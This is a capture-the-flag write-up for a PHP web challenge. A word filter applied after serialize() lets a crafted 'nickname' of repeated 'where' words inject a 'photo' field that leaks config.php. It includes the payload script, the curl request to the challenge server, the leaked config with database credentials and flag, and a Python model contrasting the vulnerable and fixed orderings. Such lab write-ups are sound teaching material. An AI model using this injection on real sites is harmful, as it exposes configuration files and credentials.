- We can post any string to update.php as the "nickname" array.
- The serialized object is broken because filter() runs on the output of serialize().
- The string length grows by one character each time filter() replaces 'where' with 'hacker' in the serialized string.
nickname.py
#!/usr/bin/python
# -*- coding:utf-8 -*-
# Builds the nickname payload: enough "where" words that filter()'s one-byte-longer
# replacement ("hacker") grows the string by exactly len(suffix), so the stale
# s:N length swallows the "where" run and the suffix is parsed as a new "photo" member.
import urllib, urllib2

# --- main ---
def main():
    suffix = '";}s:5:"photo";s:10:"config.php'
    string = "where" * len(suffix) + suffix
    print "[+] attack with string: %s" % string

if __name__ == '__main__':
    main()
I posted the generated string to update.php as 'nickname[]' with curl.
$ curl -v -F photo=@./hoge -F phone=11111111111 -F email="[email protected]" -F nickname[]=wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere;}s:5:photo;s:10:config.php -b "PHPSESSID=qqvl7cuj1lru13a3rimfjme4u5" http://202.120.7.203:8888/update.php
After the update, the flag can be read from the src of the profile's img tag: it is config.php, base64-encoded.
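To see why the stale length works and what the fix looks like, here is an added Python 3 model (not the challenge's source and not the author's script) of a PHP-style serialize/unserialize pair, the word filter, and both orderings: the vulnerable one filters the serialized text, the hardened one filters the fields before serialize(). The filter rule 'where' -> 'hacker', the profile values and the ASCII-only length assumption are mine.

```python
def php_serialize(v):
    """Minimal PHP serialize() for ints, ASCII strings, lists and dicts (assumed: byte length == len)."""
    if isinstance(v, int):
        return "i:%d;" % v
    if isinstance(v, str):
        return 's:%d:"%s";' % (len(v), v)            # the declared length is fixed here...
    items = dict(enumerate(v)) if isinstance(v, list) else v
    body = "".join(php_serialize(k) + php_serialize(x) for k, x in items.items())
    return "a:%d:{%s}" % (len(items), body)

def php_unserialize(data):
    """Minimal PHP unserialize(): trusts every declared length and ignores trailing data, as PHP does."""
    def parse(pos):
        tag = data[pos]
        if tag == "i":
            end = data.index(";", pos)
            return int(data[pos + 2:end]), end + 1
        q = data.index(":", pos + 2)                   # 's' and 'a' both carry a length/count next
        n = int(data[pos + 2:q])
        if tag == "s":
            if data[q + 2 + n:q + 4 + n] != '";':      # ...and this is the only check made on it
                raise ValueError("string length mismatch at offset %d" % pos)
            return data[q + 2:q + 2 + n], q + 4 + n
        if tag == "a":
            out, pos = {}, q + 2
            for _ in range(n):
                k, pos = parse(pos)
                out[k], pos = parse(pos)
            if data[pos] != "}":
                raise ValueError("array not closed at offset %d" % pos)
            return out, pos + 1
        raise ValueError("unsupported tag %r at offset %d" % (tag, pos))
    return parse(0)[0]

def filter_words(v):
    """Stand-in for the challenge's filter(): 'where' -> 'hacker', one byte longer per hit; recursive."""
    if isinstance(v, list):
        return [filter_words(x) for x in v]
    if isinstance(v, dict):
        return {k: filter_words(x) for k, x in v.items()}
    return v.replace("where", "hacker") if isinstance(v, str) else v

def stored_photo(filter_first):
    """Stores the writeup's payload as nickname[] and returns the 'photo' the app would read back.
    filter_first=False is the vulnerable order (filter the serialized text); True filters the fields first."""
    suffix = '";}s:5:"photo";s:10:"config.php'
    profile = {"phone": "11111111111", "email": "user@example.com",   # constructed sample values
               "nickname": ["where" * len(suffix) + suffix], "photo": "upload/avatar.png"}
    stored = php_serialize(filter_words(profile)) if filter_first else filter_words(php_serialize(profile))
    return php_unserialize(stored)["photo"]
```

With the vulnerable ordering the 31 replacements make the declared s:186 cover exactly the "hacker" run, so the suffix becomes a second "photo" entry; filtering before serialize() keeps every declared length in step with the data and the smuggled key is just part of the nickname.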
config.php
<?php
['hostname'] = '127.0.0.1';
['username'] = '0ctf';
['password'] = 'oh-my-****-web';
['database'] = '0CTF_WEB';
= '0ctf{fa717b49649fbb9c0dd0d1663469a871}';
?>